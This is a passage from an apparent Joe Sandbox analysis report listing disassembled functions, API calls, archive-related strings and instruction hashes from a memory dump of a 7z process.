                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641B9
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641C5
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641D1
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641DD
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641E6
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641EF
                                                                                                                                                                                                  • Part of subcall function 0096419C: free.MSVCRT ref: 009641F8
                                                                                                                                                                                                • free.MSVCRT ref: 00973F45
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                • Instruction ID: b772c51721a0c648ee985e6830890cf7732909dce8a4c9cae897b406c1bd23d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE014C73A25390CADB219F1DC18116DBB64F759FE83689116EB4907760E732C883C7A1
                                                                                                                                                                                                Function 00948624 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                • Instruction ID: e328020e944ce21eed7dc197f8ac7e294389fa43111f1a4577595d3e6a13e3fd
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                • Instruction Fuzzy Hash: B5014B7631624086E710CF14C56C35E7BA0B7D5B68F140308DBA44B3D1C7BAC54ACB94
                                                                                                                                                                                                Function 0094CB78 Relevance: 1.3, APIs: 1, Instructions: 32COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                • Instruction ID: ebb0f0362c11f56a58236ee3fcb5e476128c201a576fde2e251fed409cb0d438
                                                                                                                                                                                                • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF0E5A23111488BCB009F7999D1B6821A1FB48796FA05839EF8687B02E928CC99D724
                                                                                                                                                                                                Function 0094CB34 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 009489D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009489EA
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0094CB49
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                • Instruction ID: 33ef6c5487041c563b080f355e8fa772262c9b74a6dd057afbdeb0dc7b092a28
                                                                                                                                                                                                • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16D05B817610948ADB505AB95CD173D00C1E718755FD01435ED5BC6253E81CCDC9A32A
                                                                                                                                                                                                Function 00943314 Relevance: 1.3, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2162964266-0
                                                                                                                                                                                                • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                • Instruction ID: b525ce2616d072f2cc844561c114646e5f159086ef30d66fe68885f3c699f5b9
                                                                                                                                                                                                • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 27D0A7A77416C887CA04AF27D681A1DA321EBCCFD4748D0249F080BB4ADE30CCE5C740
                                                                                                                                                                                                Function 009489D8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009489EA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                • Instruction ID: e8fe4d8e9b48c2b2515312dfac9b79b399fa7377fb7de64ad83bf77b56b78d59
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AD0A9B2A01D8480DB251FBEC8407382368AB19F74F288320CAB04A3D0EF2889C68302
                                                                                                                                                                                                Function 0094CDF4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                • Instruction ID: c41b071190f4993466377805c9ddeb2c47b438dd3b8f94f28a466f618d8ce5cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 69C08C917C32880ACA4D222B2F86B3C02460FCEBD5E8C4020AE480BB53DE548CE28700

                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                Function 0094F1B4 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 318COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                • API String ID: 1534225298-798110030
                                                                                                                                                                                                • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                • Instruction ID: a7628e51651dbb52f6be2ce16f444e14373ee4b450a8a2a38d0dd5def8f7e797
                                                                                                                                                                                                • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                • Instruction Fuzzy Hash: 12C18172219A8186CB14EF11F8A0B6EB765FBC5B90F945131FA8E43B69DF38C485CB40
                                                                                                                                                                                                Function 00972578 Relevance: 45.3, APIs: 36, Instructions: 335COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                • Instruction ID: 7af489e6785cca1e2e4136d6c363861f72f79fa7715d4dbb77b9c256ca05ae1b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D14F77219AC481CA38DF26D460AAE77A4F7CAB84F419152EF9E57725CF38C885CB04
                                                                                                                                                                                                Function 00983528 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 472stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                                                                                • String ID: data:
                                                                                                                                                                                                • API String ID: 527563900-3222861102
                                                                                                                                                                                                • Opcode ID: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                • Instruction ID: 1331123792c3f4ffeffad5b57c0b1c240ed43e2c8cdbbc073e6acbd439fa02e0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                • Instruction Fuzzy Hash: B6021473308A81D7DB20EF35E8907AE77A0F795B88F449015EE4A47769EB78CA49C740
                                                                                                                                                                                                Function 0097FA0C Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 489COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0097FAAC
                                                                                                                                                                                                • free.MSVCRT ref: 0097FAC0
                                                                                                                                                                                                • free.MSVCRT ref: 0097FC43
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                  • Part of subcall function 0097F820: _CxxThrowException.MSVCRT ref: 0097F88D
                                                                                                                                                                                                • free.MSVCRT ref: 00980031
                                                                                                                                                                                                  • Part of subcall function 0097F8B8: memmove.MSVCRT ref: 0097F91E
                                                                                                                                                                                                  • Part of subcall function 0097F8B8: free.MSVCRT ref: 0097F926
                                                                                                                                                                                                  • Part of subcall function 0097F93C: memmove.MSVCRT ref: 0097F992
                                                                                                                                                                                                  • Part of subcall function 0097F93C: free.MSVCRT ref: 0097F99A
                                                                                                                                                                                                • free.MSVCRT ref: 009800EA
                                                                                                                                                                                                • free.MSVCRT ref: 009800F2
                                                                                                                                                                                                • free.MSVCRT ref: 00980101
                                                                                                                                                                                                • free.MSVCRT ref: 0098010A
                                                                                                                                                                                                • free.MSVCRT ref: 00980113
                                                                                                                                                                                                • free.MSVCRT ref: 00980121
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00980184
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Duplicate filename on disk:, xrefs: 0097FCB4
                                                                                                                                                                                                • Duplicate filename in archive:, xrefs: 00980149
                                                                                                                                                                                                • Internal file name collision (file on disk, file in archive):, xrefs: 0098015D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                • API String ID: 3338823681-819937569
                                                                                                                                                                                                • Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                • Instruction ID: 0d936c3a050e5763616e6f14f59b666162dbeeea9d08f4633da4d55d0ba613b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE128C73218A8486CB20DF29E45075EB7A5F3C9B90F509625EB9E57B58CF38D895CF00
                                                                                                                                                                                                Function 0095AF58 Relevance: 11.7, APIs: 9, Instructions: 447COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                • Instruction ID: 3f52b3c0704504a4465a8028c3c743a8a0b270230924cdde11055780eebd2650
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B026932209B8186DA24DF66E4903AEB365FBC5B85F544126DF8E57B69DF3CC848CB40
                                                                                                                                                                                                Function 00948F18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00948F7A
                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 0094905E
                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 009490B5
                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 009490F6
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetModuleHandleW.KERNEL32 ref: 0094ABD1
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetProcAddress.KERNEL32 ref: 0094ABE1
                                                                                                                                                                                                  • Part of subcall function 0094ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0094AC32
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                • String ID: ($:
                                                                                                                                                                                                • API String ID: 4250411929-4277925470
                                                                                                                                                                                                • Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                • Instruction ID: a64cf50f340f8ba56ee3a444f44281e17a7b42561ed5528919348bd3d26e8a9e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6151AF33608BC196CB20DF20F055B9EB769F389798F548526DB8907B58EB79C494CB40
                                                                                                                                                                                                Function 0094881C Relevance: 10.6, APIs: 7, Instructions: 102COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$DriveLogicalStrings
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 837055893-0
                                                                                                                                                                                                • Opcode ID: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                • Instruction ID: b33f74afb56dfb4dcaebf7b1fd78666c15efbbb5df700a24a0187b113efb3752
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de173a54933036e0db587b8e1d0ec2bc758cc62df0222796deffbdb40624916
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7031C763305B4155DA34EF22E851B6F6255BBC9BE8F888234EE5D57384DF38C946C300
                                                                                                                                                                                                Function 009496AC Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 009496D1
                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00949723
                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 0094976C
                                                                                                                                                                                                • free.MSVCRT ref: 00949779
                                                                                                                                                                                                • free.MSVCRT ref: 00949796
                                                                                                                                                                                                • memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 009497C4
                                                                                                                                                                                                • free.MSVCRT ref: 009497CD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ControlDeviceFileHandleInformationmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2572579059-0
